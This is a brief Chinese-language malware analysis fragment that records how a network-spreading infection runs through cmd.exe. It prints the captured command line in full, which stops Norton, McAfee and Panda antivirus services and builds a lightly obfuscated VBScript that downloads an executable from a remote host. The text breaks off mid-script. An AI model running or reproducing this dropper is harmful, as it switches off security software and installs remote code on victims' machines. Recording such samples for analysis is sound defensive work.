找到了它是如何运行的:通过cmd.exe执行下面的命令,通过网络传播的
-----------------------------------------------------------
CommandLine = cmd /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://192.168.0.150:15036/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\upnt.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = Create
Object("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = Create
Object("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs€C